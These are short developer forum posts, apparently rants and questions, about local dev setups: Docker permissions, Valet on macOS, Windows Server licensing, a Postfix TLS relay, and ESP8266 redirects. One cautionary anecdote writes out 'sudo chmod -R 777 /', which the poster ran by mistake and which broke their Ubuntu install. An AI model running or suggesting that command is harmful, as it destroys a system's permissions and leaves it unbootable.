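One way this is commonly handled, offered as a sketch rather than the blessed answer: make www-data own var/ in the image, and run one-off commands as that same user so nothing gets created as root:

# Dockerfile (sketch)
RUN chown -R www-data:www-data /application/var
USER www-data

# one-off CLI runs, assuming a docker-compose service named php:
docker-compose exec -u www-data php bin/console cache:clear
-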
Just set up an IPsec tunnel and route 192.168.50.0/24 to 192.168.0.0/16 over that tunnel in phase 2. We will be able to see the 192.168.50.6 machine from the remote 192.168.0.0/16 subnet.
Do it.
Why can't we send an ICMP echo from a machine on the local subnet to another machine on the same subnet??? Also, the remote subnet reaches only the BSD machine; it doesn't go any further. Whyy
I know I shouldn't have done it, but the SDM and my manager insisted... And now they expect me to fix timeouts when the remote subnet belongs to a different company. -
This happened to me sometime back.
I wanted to try out a WordPress plugin on my local machine before installing it on a production server. It's an Ubuntu machine. I downloaded and installed XAMPP, then set up WordPress with MySQL. When I tried uploading the plugin zip file, it threw a permission error, asking me to fix permissions or use FTP. I thought I'd just chmod 777 the WordPress directory recursively, to fix this the easy way.
I ran the command; it looked like it hung. I terminated it with Ctrl+C and ran the same command again. Again it was taking a long time. It should not take that long to recursively change the permissions of just a WordPress directory. I thought something was wrong. Before I knew it, the damage was already done.
Looks like I ran the command
sudo chmod -R 777 /
instead of
sudo chmod -R 777 ./
Fuck, I missed a dot in the command, and it was changing the permissions of everything on my machine. The System Monitor showed CPU usage spiked to 100%. I couldn't close or open any program. I force-shutdown the machine using the power key. It didn't boot again. Recovery mode didn't help. It looked like there was no easy way to recover from this damage. Most of the files I needed were backed up in the cloud, but I still needed a few more personal files before I could format and reinstall Ubuntu. Then I realised I had Windows dual-booted: I booted into Windows, used an ext4 reader to recover the files, then formatted and reinstalled the OS. It took a few hours to get back to my previous setup.
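In hindsight, even the intended command was overkill; something scoped and less destructive would have fixed the upload error, e.g. sudo chown -R daemon:daemon ./wordpress (XAMPP's bundled Apache usually runs as the daemon user, but check with ps first), which hands the directory to the web server without opening it up to everyone.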
Lesson Learned: Don't use sudo unnecessarily.
Double check the command while executing.
Running a wrong command with root permissions can fuck up your entire machine. -
Goodbye Ampps, hello Valet!!
I just got a MacBook Pro recently for personal web dev stuff. Previously, I usually used Ampps (like MAMP) for my local development.
But I wanted to move away from that, as I wanted to go through the whole process of setting up my own local dev env.
After 3 days of trial and error and many dead ends, I finally managed to get an existing Craft project running on Valet. The most tedious part was figuring out how to connect Sequel Pro to the local MySQL.
Through this whole process I've learned how to use Homebrew, set up MySQL with Sequel Pro, and use Valet, and most importantly, I learned how to troubleshoot these problems...
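For anyone attempting the same, the rough sequence, from memory and worth checking against the current docs, was something like:

brew install php mysql
brew services start mysql
composer global require laravel/valet
valet install
cd ~/Sites && valet park
# Sequel Pro then connects to 127.0.0.1:3306 (root, empty password by default)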
I exclaimed a big YES! and Mum came rushing into my room thinking I'd gone mad... whateva...
Next step, figure out Docker.
#feellikeimoncloudnine -
How do other developers handle local websites that are large in size? Currently the code and site need to be set up for each client, for several developers. We use GitHub and Bitbucket repos for the code.
The biggest issue is downloading the site files and setting them up locally for each developer. We used Docker for some projects, but ran into permission issues, and storage space became a problem. -
After a long struggle, this has become a rant.
We've tried numerous ways to make a local server / XAMPP / Bitnami work with Ubuntu 14.04 so that we can get working on WP and then set up a git repo. I thought life would be easy one day.
Are we the only ones struggling to make this thing work? -
> Get sent to local client that manages most services on prem themselves
> We just deliver the software and setup instructions, client is self-proclaimed "technical enough" to handle the rest
> Never had issues with them, client for about 1.5 years, we assume they are indeed technical enough
> Local client needs me for some help with their "backup solution"
> Cron job that dd's entire disk every week to external ssd.
> External ssd finally caved in after what was most likely years of torture
> Has nothing even remotely to do with our software (which has built-in backups, which they apparently don't use)
> I get scolded and screamed at when I say not our problem
> Fml -
So, as a personal project for work, I decided to start data-logging facility variables; it's something we might need to pick up at some point in the future, so I decided to take the initiative since I'm the new guy.
I set up some basic current-loop sensors for things like gas line pressures for bulk nitrogen and compressed air, but decided to go with a more advanced system for logging the temperature and humidity in the labs. These sensors come with 'software': it's a website you host internally. Cool, so I just need to build a simple web server to run these PoE sensors. No big deal, right? It's just an IIS service. Months after ordering Server 2019 through SSC, I got 4 activation codes, 2 MAK and 2 KMS. I won the lottery; now I just have to download the Server 2019 retail ISO and... it won't take the keys. Back to purchasing: "Oh, I can download that for you, which key is yours?" Um... I dunno, you sent me 4. Can I just get the link? "Well, you have to have a login." OK, what building are you in, I'll drive over with a USB key (hoping they're on the same campus). "The download keeps stopping, I'll contact the IT service in your building." A week later I get an install ISO, and still no one knows which key is mine. Local IT service suggests it's probably a MAK key, since I originally got a quote for a retail copy and we don't run a KMS server on the network I'm using for testing. Well, doesn't Windows reject all 4 keys and then proceed to register with a non-existent KMS server on the network I'm using for testing. Great, so now this server, which is supposed to be connected to a private network for the sensors and use its second NIC for an internet connection, has to be connected to the old network I'm using for testing, because that's where the KMS server seems to be. OK, no big deal: the old network has internet, except the powers that be want to migrate everything to the new, more secure network, but I still need to be connected to the KMS server because they sent me the wrong key. So I'm up to three network cards, some of my basic sensors are running on yet another network, and I want to migrate the management software to this hardware so all my data logging lives in one system. I had to label the Ethernet ports just so I could hand over the hardware for certification and security scans.
So at this point I have my system running, with a couple of sensors set up with static IPs, because I haven't had time to set up DNS for the private network the sensors run on. Local IT goes to install McAfee and can't, because it isn't compatible with anything newer than 1809. I get a message back that "we only support up to 1709". I point out that it's Server 2019. "Oh yeah, let me ask about that." A bunch of back and forth ensues, and finally local IT gets a version of McAfee that will install and runs the security scan again. I get a message back: "There are two high-risk issues on your server." My blood pressure is getting high as well. The risks, looking at them: the McAfee version is out of date, and Windows Defender is disabled (because of McAfee).
There's a low-risk issue as well, something relating to the DNS service I didn't fully set up. I tell local IT to just disable it for now, then think, what the heck, I'll remote in and do it myself. Nope, can't remote into my server. Oh, they renamed it; well, that's not going to stay that way, but whatever. Oh, here's the IP they assigned it. Nope, can't remote in, no privileges. Now I'm really getting displeased: I can't have admin privileges on the network you want me to use to support the service, on a system you can't support, and I'm supposed to believe you can migrate the life-safety systems you want us to move? I'm using my system to prove that the 2FA system works; at this rate, I'm going to have 2FA access to a completely worthless, broken system in a few years. Good thing I rebuilt the whole server in a VM that I'm planning to deploy before I get the official one back. I'm skipping a lot of the ridiculous back-and-forth conversations, because the more I think about it, the more irritated I get. -
Hey, anyone have experience with email encryption?
I need to set up TLS for email for all devices on premises. The printer and some other devices do not support TLS.
I'm thinking I could use a local Exchange server that forwards to our Office 365, as we use Outlook for the domain. But I would rather use some Linux solution.
We have multiple IPs we might send from.
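If you go the Linux route, the standard pattern is a local Postfix relay that accepts plain SMTP from the printer on the LAN and forwards everything to Office 365 over TLS. A minimal main.cf sketch, untested and assuming SASL credentials in /etc/postfix/sasl_passwd:

# /etc/postfix/main.cf (excerpt)
relayhost = [smtp.office365.com]:587
smtp_tls_security_level = encrypt
smtp_sasl_auth_enable = yes
smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
smtp_sasl_security_options = noanonymous
-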
Every time I turn on device mode in Google Chrome DevTools, I lose my session (I'm assuming it deletes the cookies).
1. Is this just in my local setup?
2. Is there a way to keep my current session every time I turn device mode on/off in Chrome?
3. What other options do I have for live-testing responsive design on my website?
Thanks! -
! Rant
I recently received my ESP8266 and, for better or worse, quickly flashed it to use thingsSDK and Espruino.
I have set up a web server on it, but at the moment you need to go to its local IP to see the page. Has anyone tried this before and managed to redirect all requests to that page? Any ideas are welcome; I know this can be done easily with Lua, but I can't code Lua, yet...
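Not Lua, but on Espruino the redirect itself is small; a sketch in Espruino JavaScript, untested on real hardware. Note it only catches HTTP requests that already reach the ESP; answering for arbitrary hostnames (a true captive portal) would additionally need DNS tricks, which is a separate fight:

var http = require("http");
http.createServer(function (req, res) {
  if (req.url !== "/") {
    // bounce every other path back to the landing page
    res.writeHead(302, { "Location": "/" });
    res.end();
    return;
  }
  res.writeHead(200, { "Content-Type": "text/html" });
  res.end("<html><body>Hello from the ESP8266!</body></html>");
}).listen(80);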